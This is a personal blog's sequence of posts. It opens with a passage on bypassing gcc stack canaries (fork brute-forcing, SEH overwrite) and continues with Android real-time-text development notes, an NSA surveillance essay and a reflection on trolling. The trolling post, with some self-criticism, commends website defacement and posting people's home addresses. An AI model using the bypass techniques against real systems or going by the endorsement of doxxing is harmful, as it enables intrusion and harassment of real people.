0x0804858f <+148>: mov 0x21c(%esp),%edx
0x08048596 <+155>: xor %gs:0x14,%edx
0x0804859d <+162>: je 0x80485a4 <main+169>
0x0804859f <+164>: call 0x80483c0 <__stack_chk_fail@plt>
0x080485a4 <+169>: leave
0x080485a5 <+170>: ret

So the canary value comes from gs:0x14, which is the struct pthread thread descriptor (info, code). Once generated, it is a static value, so what we need to do it copy it from gs:0x14 back to %esp + 0x21C after smashing the original value. But copying that value requires code execution, which we are trying to achieve. We’re stuck.

Previous versions of canary bypass have targeted locations besides the saved %eip, like other local pointers that happened to be above the buffer, or the function’s arguments. But the current SSP is smart enough to reorganize the stack frame such that all the buffers are near the top, all the locals are below them, and arguments are copied below the buffers before using them. Thanks IBM!

On Windows, the stack canary works via SEH, so if you can overwrite the exception handler, you you might be able to get control that way (or you can cause an exception before the canary is checked, if you control the SEH record). A good resource on Windows defenses and bypasses is at Corelan.be.

Canary checking is more straightforward with Linux/gcc, though, so we don’t have an easy workaround. For a trickier attack, consider that the value is not reset if the process fork()s, as a server might do without calling exec(), so this might give you a chance to guess the same value repeatedly. On a 32-bit system, the value is brute forceable this way, but not every process fork()s, and few servers would still be 32 bit these days. This paper proposes a defense against the forking attack.

There is still some remote chance of corrupted data if there are multiple buffers in the stack frame, and the higher one stores pointers or some other exploitable data, and the lower one can overflow into it. You may be able to make other parts of the program misbehave by manipulating this data. But that’s not the case in our simple example. You might find this more useful in C++ objects, which contain function pointers, and may be on the stack! To dig deeper here, heap overflows and use-after-free bugs on the heap generally target C++ objects and their function pointers, but this is a whole other topic.

I heard a talk by Mudge at Summercon this weekend where he stressed that “we have to get beyond controlling the instruction pointer”; that is, a lot of critical systems can be disrupted without executing your own code. Think of industrial systems or infrastructure: you don’t need to run malware on the power grid, you just need to crash the program to turn the lights off. His example was an oil drilling rig: if the drill stops, the molten earth solidifies around it, knocking it offline for at least a year. Defense systems are another example where denial-of-service is nearly as bad as code execution (which can, itself, of course cause DOS). The stack canary is no use in these cases; the buffer overflow still happens and causes the program to crash.

In the case of your PC or server, though, where crashing is not that terrible, the stack canary is a pretty good defense. I haven’t read of any techniques to reliably rewrite the canary value in all cases, i.e. cases where you can’t fork(). If that changes, I’ll update this.


Putting it all together

Here are some good walkthroughs on how to bypass these defenses in practice, in a situation where it is in fact possible (e.g. server process that calls fork(), and the ability to call usleep() to learn the base address of libc).

Real-time text development notes 2

Wednesday, March 9th, 2016

When I started actually trying to use Omnitor’s t.140 library to actually receive some real-time text in my Android app, it seemed like it would be a breeze. They provided a helpful little example program with some extra classes that make it look very easy to use. Nice.

Their library is kind of old, so it is a plugin for the Java Media Framework, which is very old (its website is excited to announce support for MP3!), and plenty of people warn against trying to use JMF on Android. But the cross-platform jar is still available, and it seemed worth a try. Even if it’s not built into the JRE in Android, hopefully we can still use the external jar. However, one problem arose: one of the classes that Omnitor provides implements the javax.media.BufferControl interface, which contains this method:
public Component getControlComponent() {
return null;
}

This is supposed to return a java.awt.Component, but Android doesn’t include this. When people say that “Android doesn’t use Java”, this is what they mean. It is perfectly logical that Android has a different UI layer instead of the desktop windowing stuff. So this doesn’t compile.

But wait, we don’t actually need to do anything window-related here. No one is actually going to use anything this method returns. It returns null, so there’s no way that the object we’re returning actually HAS to provide the functionality of a Component. OK, maybe we can get around this by creating a little placeholder file to silence the compiler:

package java.awt;

public class Component {

}

Upon trying this, I received the best compiler error I have ever encountered:

Ill-advised or mistaken usage of a core class (java.* or javax.*)
when not building a core library.

This is often due to inadvertently including a core library file
in your application's project, when using an IDE (such as
Eclipse). If you are sure you're not intentionally defining a
core class, then this is the most likely explanation of what's
going on.

However, you might actually be trying to define a class in a core
namespace, the source of which you may have taken, for example,
from a non-Android virtual machine project. This will most
assuredly not work. At a minimum, it jeopardizes the
compatibility of your app with future versions of the platform.
It is also often of questionable legality.

If you really intend to build a core library -- which is only
appropriate as part of creating a full virtual machine
distribution, as opposed to compiling an application -- then use
the "--core-library" option to suppress this error message.

If you go ahead and use "--core-library" but are in fact
building an application, then be forewarned that your application
will still fail to build or run, at some point. Please be
prepared for angry customers who find, for example, that your
application ceases to function once they upgrade their operating
system. You will be to blame for this problem.

If you are legitimately using some code that happens to be in a
core package, then the easiest safe alternative you have is to
repackage that code. That is, move the classes in question into
your own package namespace. This means that they will never be in
conflict with core system classes. JarJar is a tool that may help
you in this endeavor. If you find that you cannot do this, then
that is an indication that the path you are on will ultimately
lead to pain, suffering, grief, and lamentation.

This is amazing. It clearly describes the problem, offers understandable suggestions as to the possible causes, provides detailed information about how to fix them, and offers some useful advice/context. This is why programmers need to be good at writing human languages and dealing with people.

The warning here is pretty clear for my case: don’t use JMF, it depends on stuff that isn’t in Android. My situation is definitely what the message is talking about re: grief and lamentation. But…I’m not about to rewrite Omnitor’s whole library. Modifying it not to use JMF sounds pretty hairy. Maybe there’s a way to get past this. How about if we use the actual original version of java.awt.Component? That’s in rt.jar, which comes with your JVM, so we can unzip it and find Component.class, and put that in its own jar. No luck, same error, we’re still trying to use the java.awt package within our project. Maybe try the whole rt.jar? Same problem. Isn’t there some way around this?!

Well, there’s that –core-library option. In Android Studio 1.5, this is found in File > Other Settings > Default Settings > Build, Execution, Deployment > Compiler > Android Compilers. Wow, that’s pretty buried. They sure don’t want me to use this. In fact, if I try to use it, nothing happens. Some StackOverflow posts discuss this flag and how to add it, one of which is similar to an Android bugtracker post that basically says don’t do this. One comment says this no longer works on Android Studio 1.2, which is older than my version. In my great searching, I came upon a mailing list discussion that apparently led to the fantastic error message, but no real help. I am inclined to think that this may now be intentionally disabled, but the vestigial checkbox remains. Shucks.

Let’s back up. The problem is that we need to return a “Component” but the compiler doesn’t know of any such class. If only this interface called for returning something else…aha! Since we are using JMF in a jar file, not as part of the actual JRE, let’s modify that jar. This involves decompiling it, which is no problem in Android Studio (IntelliJ). I decompiled Control.class, copied the source to a new project, and changed
public Component getControlComponent()
to
public Object getControlComponent()
This is sketchy, I know. There is all sorts of risk that other things that use this interface could break. But as far as I know, I’m not using anything else that uses this interface. I just want to use this one little class from Omnitor’s example! So, I unzipped the jar, compiled a new Control.class, replaced the existing .class and repackaged the jar with:
$: jar cf new_jmf.jar *
Plop that into my app as a library, and what do we get?
bad class file magic (cafebabe) or version (0034.0000)
Hm. Dang. Something is wrong with my jar. Looking at the jar in a hex editor, I see that indeed my number is CAFEBABE 00000034, so what’s so bad about that? It was produced by the official jar tool, so it seems legit. Isn’t this what is expected by that error message? Posts online suggested that it had to do with the Java version of your project. I’m using 1.8, so I downloaded the official Oracle JDK 1.7 and set Android Studio to use that for compiling this project. No change. Luckily someone else spent even longer than I did on this and figured out that what this message is expressing (very badly) is that the Java version the JAR was compiled with is bad, since Android only supports 1.7. Fine, I recompiled my modified Control.class again using 1.7, repackaged the jar again, and…it worked! Wow!

Now, simply managing to compile something is not a very big victory. Does the app actually work? I called it from SIPCon1 and sent some text, just trying to write it to the log. Nothing there, except some errors:

03-09 13:47:07.537 8307-8365/com.laserscorpion.rttapp W/System.err: IOException in readRegistry: java.io.InvalidClassException: javax.media.protocol.ContentDescriptor; Incompatible class (SUID): javax.media.protocol.ContentDescriptor: static final long serialVersionUID =-7089681508386434374L; but expected javax.media.protocol.ContentDescriptor: static final long serialVersionUID =912677801388338546L;
03-09 13:47:07.538 8307-8365/com.laserscorpion.rttapp W/System.err: Could not commit protocolPrefixList
03-09 13:47:07.538 8307-8365/com.laserscorpion.rttapp W/System.err: Could not commit contentPrefixList
03-09 13:47:07.540 8307-8365/com.laserscorpion.rttapp I/System.out: No plugins found
03-09 13:47:07.542 8307-8365/com.laserscorpion.rttapp W/System.err: java.lang.reflect.InvocationTargetException
03-09 13:47:07.543 8307-8365/com.laserscorpion.rttapp W/System.err: java.lang.reflect.InvocationTargetException
03-09 13:47:07.544 8307-8365/com.laserscorpion.rttapp W/System.err: java.lang.reflect.InvocationTargetException
03-09 13:47:07.553 8307-8365/com.laserscorpion.rttapp W/System.err: Failed to open log file.
03-09 13:47:07.562 8307-8365/com.laserscorpion.rttapp I/art: Rejecting re-init on previously-failed class java.lang.Class
03-09 13:47:07.562 8307-8365/com.laserscorpion.rttapp I/art: Rejecting re-init on previously-failed class java.lang.Class
03-09 13:47:07.562 8307-8365/com.laserscorpion.rttapp I/art: Rejecting re-init on previously-failed class java.lang.Class
03-09 13:47:07.562 8307-8365/com.laserscorpion.rttapp I/art: Rejecting re-init on previously-failed class java.lang.Class

A series of errors that seems to stem from a failed serialization. It looks like in making changes to jmf.jar, I confused some class about what is what. Something is unsure if the ContentDescriptor in my jmf.jar is the correct ContentDescriptor that it needs, because the serialVersionUID is wrong. This isn’t surprising, since it seems ContentDescriptor doesn’t define an explicit serialVersionUID. The only way around it is to trick the JRE into thinking the new jar is the old one. OK, let’s define what it wants and remake the jar again:

static final long serialVersionUID = 912677801388338546L;

Same problem. Apparently Proguard may mess up your serialVersionUIDs on Android. You can add some options in a Proguard config file (proguard-rules.pro, not proguard.cfg, that’s out of date) to stop this. But this still didn’t help. I got the exact same message, which was strange, because I had changed the value. After banging my head against it for a while, I realized the error message is ambiguous; it didn’t exactly say who expected which value. It found -7089681508386434374L but expected 912677801388338546L, but where did it find and expect those? I still don’t really know, but I don’t care either, because using the other value in my recompiled jar worked:

static final long serialVersionUID =-7089681508386434374L;

Phew, that error went away. But…the rest didn’t. This was not the cause of entire cascade. JMF is still just not working.

This is unsurprising. I was basically warned. I’m firmly in grief and lamentation land, and I knew it was coming. Android is not Java. This old and crusty JMF thing is kind of part of the Java™ platform, but is really not something you can expect to work on Android, which just uses the Java syntax, and a few convenient parts of the Platform™. Some things, like JAIN SIP, use stuff that is basic enough that it’s not hard to make it work on Android. This “media” framework does not. Sigh.

Well, what now? Omnitor’s library depends on this. Android doesn’t even offer a bare RTP framework we can use, since what it has only does audio. This is not great. Time to take stock of my plan.

Real-time text development notes 1

Sunday, March 6th, 2016

As a school project, I’m working on an Android real-time text (RFC 4103) app using the NIST JAIN SIP builds for Android. My professor pointed out that all the problems I was having are probably going to trip up somebody else later, so I should document them. So, internet, here is your first installment of problems I’ve faced that you hopefully won’t. I’m a number of weeks into this project already, so I’ll need to go back and write up everything I’ve already solved. Using JAIN SIP on Android certainly involves some contortions that don’t come up in standard JAIN tutorials.


AsteriskNOW is a handy all-inclusive open-source PBX package (SIP/RTP server). Install it in a VM and you instantly have a SIP server, not too much configuration required. The configuration you do have to do has a bit of a learning curve because it is so full-featured, but overall it seems pretty nice. The help tooltips of the many, many configuration options in the FreePBX web interface leave something to be desired, but I got a couple users working before too long (hint: most of what you need is under Applicatons > Extensions, and you will want to consult Reports > Asterisk Logfiles > fail2ban to see logging of REGISTER attemps).

Because Omnitor’s RTT reference implementation SIPCon1 doesn’t seem to understand 401 and digest authentication, it has trouble registering to a modern server. If there’s some way to force Basic authentication in Asterisk, I’m not sure how. A useful Stackoverflow post by one of the Asterisk developers, Olle E. Johansson, indicated that leaving blank the “secret” for an extension disables authentication entirely for that user, so that works to get SIPCon1 talking to Asterisk.

However, another problem with Asterisk stems from the fact that it is a back-to-back UA. Thanks to Omnitor and Olle E. Johansson (who apparently also happens to be from Sweden), Asterisk can speak T.140 (RFC 4103) in its role as a B2BUA, but a surely unintentional hearing bias shows through its design. As Gunnar Hellström pointed out on the development mailing list in May 2014, Asterisk will immediately drop any call that does not include a negotiated audio stream. I encountered this same issue myself this week when trying to offer a text-only session to SIPCon1 from my own app. Not having used SDP before, it took me a little while to get JAIN SDP to cooperate (more on that later), but eventually I did:

INVITE sip:[email protected] SIP/2.0
Call-ID: [email protected]
CSeq: 1 INVITE
From: <sip:[email protected]>;tag=-1455828934
To: <sip:[email protected]>
Via: SIP/2.0/UDP 192.168.1.103:5060;branch=z9hG4bK-323734-97510ab0f8dfe28e37a44d62bc8a144c
Max-Forwards: 70
Allow: ACK, BYE, INVITE, OPTIONS, CANCEL
Contact: <sip:[email protected]:5060>
Expires: 30
Content-Type: application/sdp
Content-Length: 154

v=0
o=201 2122197558 1 IN IP4 192.168.1.103
s=RTT_SDP_v0.1
c=IN IP4 192.168.1.103
t=0 0
m=text 5061 RTP/AVP 100
a=rtpmap:100 t140/1000
a=sendrecv

I think this should be fine. I should also support t140 red, but I’ll worry about that later. I’m pretty sure SIPCon1 would accept this. But Asterisk never gives it the chance, because it assumes every call must have audio. It’s strange that it accepts the call and only then sends an immediate BYE, rather than simply responding 488 Not Acceptable. I think RFC 3261 says that when the original offer is sent with the 200 OK, and the offer is not acceptable, the caller should still send the ACK and then send an immediate BYE, which is similar to what is happening here, but not quite. If Asterisk doesn’t want to accept my text-only session, it should tell me so with 488. Whatever. Luckily Gunnar’s email helped me understand that I’m not crazy and my SDP actually was working correctly.

So Asterisk is out. Instead I tried sipXcom, which is a regular proxy. It’s pretty good so far, but is not without its own problems. Using VMWare Fusion 8.1, I got it running fairly quickly, faster than Asterisk, but ran into some quirks. It basically assumes you are using hardware phones, and when setting up a new extension, the only way around this is to say your new phone is “Jitsi”. In fact I have been using Jitsi for testing INVITEs, but to claim that all softphones must be Jitsi is a little silly. Anyway, a bigger problem is that after suspending and restoring the VM, all attempts to register got an immediate 408 Request Timeout. How could you issue 408 immediately? My Expires: header was 600, and the only 600 that could have passed in that time was maybe 600 microseconds. Rebooting fixed it.

The final problem with sipXcon for my purposes is that it doesn’t allow you to leave a user’s password blank, or otherwise disable authentication. This is a totally sensible security feature, but in this rare case, I actually do want the freedom to do this. Or at least, I’d like to use Basic authentication instead, since SIPCon1 can probably manage that. It might be possible to do at least one of these by editing a configuration file, but the web interface doesn’t seem to give an easy way. I’ll look into that later. For now I can call my app from SIPCon1, with SIPCon1 still connected to Asterisk and my app going through sipXcom.

Why I use and hate Android

Friday, November 6th, 2015

I was lucky enough to be gifted an original iPhone within the first year of them being available. I thought it was amazing, because it was (and let’s be honest, basically still is). But when it started physically wearing out, I ended up buying an Android phone, and have used Android since.

My reasoning was that Android is more like a “real” computer operating system. It exposed true multitasking to the programmer, so I as a user could run any combination of arbitrary applications at once. And you can install apps from whatever app store you want, or manually without any store in the way at all. Plus it’s open source(ish)! As someone who is now studying computer science, these kinds of things seemed important. Clearly Android is not as polished as iOS, but I came to understand why people used Windows in the 90s, or desktop Linux today; I figured that as a technical person I could handle the rough edges, no problem.

As my current Android phone is now also wearing out, it’s about time to get a new one, unfortunately. There’s a top-of-the-line Android model I’ve got my eye on that offers great specs and a much lower price than even an older generation iPhone. But after using the Windows 95 of smartphones for a few years, I have also come to remember why the shrinking number of Mac and Amiga users could remain so smug in the 90s: like Windows before it, Android kind of sucks.

If you had shown me my current broken phone 20 years ago, I would have flipped my shit at this Star Trek technology that was soon to become available to me. It’s an unbelievable future supercomputer, in your pocket! But…our standards have changed in 20 years. Even compared to my 7-year-old dual-core laptop that is also barely hanging in there, this phone is really not very powerful. I wanted my phone to act like a “real” computer, and it turns out that I expect a real computer to do a lot more than I did 20 years ago. We take bulletproof multitasking for granted now, with modern Windows descended (sort of) from VMS, modern Macs descended from BSD/Mach, and modern Linux desktops even being somewhat usable.

But now that I’m studying operating systems and have thought more about the interaction between hardware and software, I can tell you that some fundamental things have not changed: one CPU core can run one task at a time, main memory is slower than caches and registers, hitting the disk is painful, and switching between tasks is not some free magic with no overhead. The fact that your desktop/laptop computer appears to seamlessly and effortlessly run many flashy user applications at a time is a complete illusion made possible by the fact that PC hardware is really powerful now; it is actually running one thing at a time and switching between all of them hundreds of times a second so you don’t notice.

And here’s where Android kind of sucks. It does “real” multitasking all right, but you sure can’t take it for granted. Mobile CPUs use less power partly because they are just slower; phones (until recently) didn’t have anywhere near as much RAM as PCs; and even though smartphones use flash storage, it’s not exactly your desktop SSD in terms of performance. This is how you get situations where Android appears to slow to a crawl or freeze entirely for embarrassingly long periods (a couple seconds for a new phone, up to minutes for my old one).

Mobile RAM is slow enough as it is, and having to frequently swap in and out to a slow disk is really bad news. iOS was designed not to swap at all (I haven’t kept up with it so I don’t know if that’s still the case). Not running as many tasks at once means you move stuff in and out of RAM less often, your cache probably stays hotter, and you waste fewer CPU cycles context switching between user and kernel space and switching between tasks. As of a few years ago (and maybe still?), mobile hardware was legitimately not ready to do this kind of stuff, and iOS probably made the right choice in limiting user-level multitasking to a few specific things that are handled through tightly controlled OS services (obviously there are tons of invisible tasks actually running on both Android and iOS).

As it has for the last five decades, the semiconductor industry is charging ahead, delivering literally exponential progress in speed and capacity. Phones and tablets are getting more powerful. The Android phone I’m considering has more RAM than some laptops. So, is this problem solved? Well, I thought it was last time I bought a phone, and here we are now. As these things improve, we expect our devices to do more and more, and that new phone still doesn’t have as much RAM as my particular laptop, and its four cores still probably aren’t as powerful as the laptop’s two. The phone probably works pretty well straight out of the box, but I wonder how long it will stay that way.

In response to this new hardware situation, what has iOS done? Oh, they recently added the ability to run exactly two apps side by side. That…seems like a pretty good number. So the question is, is it worth paying more to do less? As a student, I’m probably not actually going to buy anything for a while, and Android sure is cheaper. I do still like the idea of being able to mess with it, and I’m becoming more able to do that now. But that’s just me – whenever anybody asks, I tell them to get an iPhone.

Why I am worried about the NSA

Monday, June 1st, 2015

People who know me will be aware that one of the main things I’ve been thinking about since June 2013 is the NSA, and surveillance in general.

This is, of course, not the case for most of those people themselves, so it is not immediately obvious to many of them why I have been spending so much of my time thinking about this. So in hopes of laying the foundation for people to understand why I care, here is my attempt at putting together all the pieces of this issue as I see them. I don’t expect to convince anyone of anything they didn’t already want to believe, but I would like people I know to understand my thinking (cue internet crazies showing up in 3, 2, 1…). It seems that a worrisome number of people I have talked to are genuinely not aware of the history and current events that makes me think that this matters.

This post is sort of long, but it originally included a few thousand more words on what exactly the NSA is doing, so I’ll spare you that for now. This is not an issue that I think should be boiled down to sound bites or discussed only in the abstract without examples, so I’ve tried to provide further reading in the inline hyperlinks. If you have enough interest in my thoughts to even be here in the first place, I hope you will stick with me to get the whole picture. You’re free to disagree about any of my conclusions, but hopefully you will at least see where I’m coming from and not dismiss me as a total conspiracy theorist (though I’m willing to hold down that corner if I have to).

Note that I may use the NSA and FBI interchangeably at points, because despite their vague assurances, I don’t believe there is really anything keeping them from secretly sharing everything with each other. When I interned at the Department of Homeland Security in college (a youthful indiscretion), I worked on a report that laid out the vision for how this would seamlessly work across agencies. We have evidence that this is now happening, so let’s go ahead and conflate the two. Update 6/24/2015: we have now learned that the FBI has access to the NSA’s cable taps, which means my assumption was right. </update>


I have heard from some of my friends who don’t think all this surveillance stuff is a big deal. Paraphrashing a couple reactions that come to mind:

  • “I don’t have anything to hide. Google and Facebook know everything I do anyway.”
  • “Isn’t this a pretty privileged thing to care about? You and your Burner friends are worried about getting in trouble for stuff you’re emailing about, but way more brown people are being screwed by the regular cops on the street every day.”
  • “Didn’t we already know they were doing this? Same old, same old.”

From where I’m sitting, these attitudes completely miss the point. I’m not worried about my own safety at all. I’m only partially offended about my own privacy being violated. This isn’t about what I personally am reading or talking about online. The problem, as I see it, is that the activities of the NSA and FBI are fundamentally incompatible with a free and democratic society.

In fact, I’m not even that concerned with them spying on most people. The scale of what they are doing is problematic, but the person who “doesn’t have anything to hide” is at least partially right: most people truly are totally uninteresting to the authorities, myself hopefully included (though the fact that most of us have curtains on our windows means that we surely must have something to hide from somebody).

This isn’t about you or me. As Edward Snowden himself put it, “Arguing that you don’t care about the right to privacy because you have nothing to hide is no different than saying you don’t care about free speech because you have nothing to say.” And you know what? Some people do have legitimate things to hide. Some people don’t (or wouldn’t today) post everything on Facebook. Some people are very interesting. And some of those people have gone on to become the most important and respected figures in our history.

Martin Luther King Jr. and Malcolm X were both subjected to heavy FBI interference. The full toolkit of 1960s-era surveillance was thrown at them, from telephoto lenses to tapped phones and secret informants. This was overt enough that they knew about it. It was no surprise to them that the power structure had no interest in their upending it, and this was just one of the many enemies they faced, from white racists to jilted members of the Nation of Islam. But it was a special kind of enemy: this was the state actively trying to disrupt peaceful political activity, to preserve its own power. These two leaders, whom we now venerate so highly, were the target of some third-world secret police shit, right here in the “center of the free world”, some of it under that same guise of “national security”.

The FBI had to expend physical human resources on this activity. An actual person had to listen to their calls, follow them around, sort through photos of them and figure out who’s who. You can’t do that to everyone, or even very many people. It was hard work to gather enough information for the letter the FBI sent to Dr. King telling him to kill himself. It was probably just as hard to gather and selectively edit the private conversations they sent to his wife to try to break up his marriage.

This isn’t hard any more. They have already done it, to everyone. They haven’t put all the pieces together, and they haven’t sent the letter yet, but they’re prepared to. GCHQ, the NSA’s psychotic little brother across the pond, is at the forefront of infiltrating and discrediting political and activist groups online, and it feels pretty dangerous to assume that the NSA and FBI would never get up to their old tricks again. (GCHQ also lumps investigative journalists in with terrorists, and I hope I don’t need to say anything else about that)

They only went after black leaders once they had risen in stature and had substantial followings, but the agencies are ready out in front this time. They’ve already got everything they need on the next up-and-coming leader, whoever that may be. Even local police have access to commercial software that will analyze social media for “any comments that could be construed as offensive” to assign a “threat rating” to individuals that officers are investigating, so we can hardly even imagine what the FBI and NSA can do.

They know who has attended the Black Lives Matter protests. They can see who in that movement is making noise on Facebook, and if those people decide to continue the discussion in “private”, they can likely read that too. The next Malcolm X may be building up their Twitter followers now, and they may not get much further if the intelligence agencies don’t want them to. Some leaders have emerged, and I’m afraid that they are probably too busy to keep themselves very safe online. This tweet and a follow-up Anonymous video claims to show the Department of Homeland Security tapping the phones of decidedly peaceful demonstrators in Chicago. Did they follow up with the NSA afterward? Update 9/23/2015: a “social media security” company apparently classified those leaders I mentioned as “Threat type: PHYSICAL, Severity: HIGH”, which is ridiculous. Not very happy to say that I was right, but well, look at that, someone is scared of them. </update>

I hope you can see now that it’s not me that I’m worried about, it’s our system, which is supposed to be among the freest in the world. I don’t think the leader of the free world should be wiretapping peaceful protestors. We’re no longer in any position to lecture China on human rights. It doesn’t look to me like the system is that much more tolerant of troublemakers now than it was during my parents’ time, so I don’t think we need to be handing it any more tools of oppression (speaking of my parents, I’ll briefly point out that the FBI went after white kids not unlike them in the 60s, too).

In high-school civics class, they taught me that democracy is “majority rule, with protection of minority rights”. Well, right now the majority, through its various three-letter agencies, is in a better position than ever before to control exactly which minorities get to exercise their first amendment rights, and I don’t have a lot of faith that it’s going to wield that power any more wisely than it did 50 years ago. The NYPD’s attitude toward Muslims in New York City certainly doesn’t seem very enlightened. Some of those people are really giving the rest of us a lesson on what we are in for. I can point to a local case, too: I have spoken to one (totally sane) police accountability organizer in SF who has good reason to suspect that their communications have come under surveillance by the city in the last year (sorry I can’t be more specific while respecting their privacy). This person has been individually targeted after they were identified; if their adversary were the federal government instead of the city, the NSA would already have quite a file on them. Luckily this person is brave enough to keep going, but who knows about the next one.

These real cases I can point to now are mostly local, but think bigger. There’s the FBI spying on Keystone XL activists, but I mean bigger than that. Consider Richard Nixon, whose enemies were black, white, and generally numerous. If Haldeman and Ehrlichman aren’t names right at the forefront of your consciousness, here’s a quick refresher: the president’s top staff hired some burglars to bug his Democratic opponent’s campaign headquarters, his lawyer unsuccessfully tried to get some money from the CIA to pay the burglars to keep quiet, the former attorney general eventually came up with the money, and a massive conspiracy ensued at the highest level of government to desperately try to keep this all secret. This was political corruption of the sort that is normally reserved for laughable kleptocracies. It is the kind of thing we want to believe couldn’t possibly happen in America. But it wasn’t even very long ago; some of the people involved in this are still alive.

Now imagine that these guys had access to the NSA’s technology today. I honestly do not understand how you could put those thoughts together and not see a problem for our entire system of government. What is going on today is not the “same old, same old”: Nixon had to hire some actual real guys to break into the DNC’s office to plant a physical microphone, but today the NSA could hand him all the information he could ask for, ready to go, with no one the wiser. Same goes for the burglary of Daniel Ellsberg’s psychiatrist’s office, and all the rest of the illegal or otherwise evil things that J. Edgar Hoover’s FBI was doing on Nixon’s behalf.

This is why I believe the activities of the NSA and FBI are an existential threat to our free society. I am not at all comfortable with the amount of distance separating their activities from the Stasi, the most effective secret police in history, and this former Stasi officer agrees. I know it seems like we wouldn’t allow things to get to that point here in the land of the free and the home of the brave, but I’m concerned that this complacent attitude is exactly why we may be in danger of it: if we don’t stop this now, we won’t be able to once it’s too late. If we allow this technology to exist, we have no idea who will come along and use it. The activities of Hoover’s FBI don’t seem like something we would allow in America, either, but it happened, and we may be setting the stage for it to happen again.

I don’t think the people setting up the system now intend to be creating the next Stasi. Most of them really do want to stop terrorists and drug cartels and all that. Every individual person involved can have the best intentions, but their collective efforts end up creating a system that gets out of control (n.b. I am deeply suspicious of the people in charge of the intelligence agencies, if not all of their underlings, but of course this is nothing new). Once it gets to that point, I think the history of the 60s and 70s shows that our democratic institutions would have trouble remaining pure, or at least however pure they currently are. You know that old saying about the relationship between power and corruption.


OK, so what do we do about it?

Today the Senate failed to renew the most controversial part of the Patriot Act, which was used to collect everyone’s phone records. That’s great, though I wouldn’t be surprised if the NSA got its hands on this bulk metadata another way, legal or otherwise. And more importantly, this doesn’t do anything about their wholesale surveillance of the internet.

But there is something else we can do. This issue is why I am planning to study security and cryptography when I go back to school this fall. If you would like one more link, here’s a piece published today explaining why I’m planning to cast my lot with the cypherpunks and crypto-anarchists rather than the politicians and lawyers (though you should still totally give your money to those lawyers at the EFF and ACLU).

If you’ve made it this far, wow, thanks. You probably have some thoughts after reading so many of mine, so feel free to share. You may not change my mind either, but I promise to listen and think about it, because you’ve already done me that courtesy.

To be or not to be (good) (or a troll)

Sunday, September 21st, 2014

I’m coming to some understanding with myself about how to at least define an issue that’s been nagging me for a few years. It boils down to how to relate to people who suck.

My natural inclination came into effect this afternoon when I was biking, which is a new thing I sometimes do now. A woman was making an illegal 3-point turn in a stupid place in her car, and a biker zoomed past behind her. She yelled at him for being an asshole. I patiently waited for her to properly orient her car and get out of my way, and then continued past and delivered a wiseass retort about how she was the one trying to turn around in the middle of the street, which unsurprisingly didn’t calm her down. I could have just ignored her or more politely pointed out her situation, but as a usual car driver, I felt she was asking to be taken down a notch for being so self-righteous.

Never mind the irony in me feeling the right to tell someone off for being self-righteous. The bigger problem I see here is the issue of whether this kind of behavior has a cumulative negative effect on the goodness of the world. I’ve been subconsciously (and now consciously) trying to figure out how I feel about this for the last 6 or 8 years.

A nice starting point is the hippies’ motto of peace and love. On the one hand, they were so obviously right that everyone should just be nice to each other that it actually does surprise me that it took such a large segment of American society that long to find the right words for it. Plenty of religions and cultures over thousands of years have come to the same conclusion. Eye for an eye → universal blindness, etc. The world would unquestionably be amazing if we just had peace and love all over the place.

But we don’t, and a lot of people explicitly reject this viewpoint. It is totally within our collective power to all decide to be nice to every single other human being, but it’s not happening now, and no matter how much acid we take it doesn’t look like the masses are about to start wearing flowers in their hair. So how should we act toward people who insist on being negative, discriminatory, hostile and greedy? There are a few options I’ve personally been considering.

Option 1: unilaterally disarm. Never mind how anyone else acts. You can only control your own behavior, so don’t partake in negativity towards other people, which only perpetuates the evil they started. Spread peace and love to anyone who is looking for it, and hope that the seeds you plant will eventually grow. Maybe disconnect entirely from the nasty parts of society and create a parallel good one. Serenity is its own reward. Ignore angry drivers.

Option 2: preach the gospel. Actively try to spread positivity and goodness. Work towards understanding between neighbors, who might start out not wanting what you’re offering. Try to improve society by participating in the good aspects of it. Maybe you can make the world a better place by reaching even one person. Be extra polite to stupid drivers, who might be having a bad day.

Option 3: strike back. Enforce your version of justice against the wicked. Drop wiseass remarks on asshole drivers, send photos of tubgirl to evil corporations, order deliveries of animal shit to racist police departments, deface their websites and post their home addresses. It’s unlikely that they’re actually going to have to reckon with Saint Peter (or be reincarnated as a cockroach or whatever your particular belief system suggests), so we better serve them their commupance in this life.

Maybe you can guess from my specific examples which option I enjoy. Which one I *should* choose, though, I believe is related to the question of “for good or for awesome?”

graph

Shitty people totally deserve to be trolled, and I’m happy to do it. It’s hilarious and fun, and at the end of the day I just don’t feel bad about it. But it doesn’t actually make them or the entire world less shitty. There’s that whole “everyone ends up blind” thing. At best, it is neutral on the good-bad spectrum, but let’s be honest, it’s probably bad. The Dalai Lama and Jesus and Gandhi and an awful lot of other people have thought this through, and they have something of a point.

Trolling and violently spreading your version of right and wrong is basically vigilante justice. Internet anarchists happen to share enough of my politics that I’m usually down with Anonymous, but I wouldn’t be as psyched about some reactionary militia taking to the internet to go after LGBT websites or something like that. It’s pretty silly to claim a monopoly on right and wrong. On a day to day basis, there’s some value in trying to coexist with people you disagree with.

Option 2 finds its way to the Good-Lame quadrant mainly by being hard, and potentially preachy. Here again you may be assuming you’ve got the right/wrong situation all figured out. Spreading understanding, say among your actual immediate neighbors, is a good way to go, but much harder than distancing yourself from conflict and directing your virtue inward so as not to continue the cycle of negativity (option 1).

The main question I’m working on right now is just how bad option 3 is. If you’re talking about actual violence, clearly that’s bad. But trolling people who were already inclined to do bad things? Is sending around packages of poo really going to lead racist cops to commit more murders than they were already going to? Is exposing all those Uber employees to tubgirl really going to lead the company to more strongly support the next military police convention? I don’t want to believe so, but I’ve got to consider the possibility.

Peace and love are great. But what are we going to do about all these bad people?